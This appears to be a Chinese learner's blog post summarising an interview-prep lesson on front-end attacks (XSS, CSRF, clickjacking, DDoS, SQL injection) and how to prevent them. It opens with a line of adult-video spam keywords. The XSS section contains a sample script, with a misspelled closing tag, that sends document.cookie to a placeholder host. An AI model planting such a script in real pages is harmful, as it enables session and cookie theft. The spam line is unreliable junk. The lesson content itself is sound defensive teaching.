第七色在线视频,2021少妇久久久久久久久久,亚洲欧洲精品成人久久av18,亚洲国产精品特色大片观看完整版,孙宇晨将参加特朗普的晚宴

為了賬號(hào)安全,請(qǐng)及時(shí)綁定郵箱和手機(jī)立即綁定

【九月打開(kāi)】第13天 前端攻擊手段有哪些,如何預(yù)防?

標(biāo)簽:
前端工具 面試 安全

第一模块(课程信息):

课程名称:2周刷完100道前端优质面试真题
课程章节:第六章第十四节 前端攻击手段有哪些,该如何预防?
主讲老师:双越

第二模块(课程内容):

课程内容概述

预防前端攻击到底前端做还是后端做?两个人不可以踢皮球,谁也推卸不了责任,不可以独善其身。
前端可以做前端的预防攻击,后端做后端的预防攻击,可以用特殊字符替换的方式。

一、XSS攻击

  • Cross Site Script跨站脚本攻击
  • 手段:黑客将js代码插入到网页内容中,渲染时执行js代码
  • 预防:特殊字符替换(前端或者后端)
<script>
var img = document.createElement('image');
img.src='https://xxx.com/api/xxx?cookie='+document.cookie
</scropt>

vue和react能够默认屏蔽掉xss攻击
vue:v-html除外
react:dangerouslySetInnerHTML***除外

二、CSRF

  • Cross Site Request Forgery 跨站请求伪造
  • 手段:黑客诱导用户访问另一个网站的接口,伪造请求
  • 预防:严格的跨域验证+验证码机制

详细过程

  • 用户登录A网站,有了cookie
  • 黑客诱导到B网站,并发起A网站的请求
  • A网站发现API有cookie,认为是用户自己操作的

预防手段:

  • 严格的跨域请求限制,判断referrer(请求来源)
  • 为cookie设置SameSite,禁止跨域传递cookie

三、点击劫持

  • Click Jacking
  • 手段:诱导界面上蒙一个透明的iframe,诱导用户点击
  • 预防:让iframe不能跨域加载

四、DDos

  • Distribute denial-of-service分布式拒绝服务
  • 手段:分布式的、大规模的流量访问,使服务器瘫痪
  • 预防:需要硬件预防,如阿里云的WAF

五、SQL注入

  • 手段:黑客提交内容时写入SQL语句,破坏数据库
  • 预防:处理输入的内容,替换特殊字符

第三模块(学习心得):

学习了5种前端攻击的手段和预防方法。

  1. XSS
  2. CSRF
  3. 点击劫持
  4. DDos
  5. SQL注入

第四模块(学习截图):

图片描述
图片描述
图片描述
图片描述

點(diǎn)擊查看更多內(nèi)容
TA 點(diǎn)贊

若覺(jué)得本文不錯(cuò),就分享一下吧!

評(píng)論

作者其他優(yōu)質(zhì)文章

正在加載中
  • 推薦
  • 評(píng)論
  • 收藏
  • 共同學(xué)習(xí),寫下你的評(píng)論
感謝您的支持,我會(huì)繼續(xù)努力的~
掃碼打賞,你說(shuō)多少就多少
贊賞金額會(huì)直接到老師賬戶
支付方式
打開(kāi)微信掃一掃,即可進(jìn)行掃碼打賞哦
今天注冊(cè)有機(jī)會(huì)得

100積分直接送

付費(fèi)專欄免費(fèi)學(xué)

大額優(yōu)惠券免費(fèi)領(lǐng)

立即參與 放棄機(jī)會(huì)
微信客服

購(gòu)課補(bǔ)貼
聯(lián)系客服咨詢優(yōu)惠詳情

幫助反饋 APP下載

慕課網(wǎng)APP
您的移動(dòng)學(xué)習(xí)伙伴

公眾號(hào)

掃描二維碼
關(guān)注慕課網(wǎng)微信公眾號(hào)

舉報(bào)

0/150
提交
取消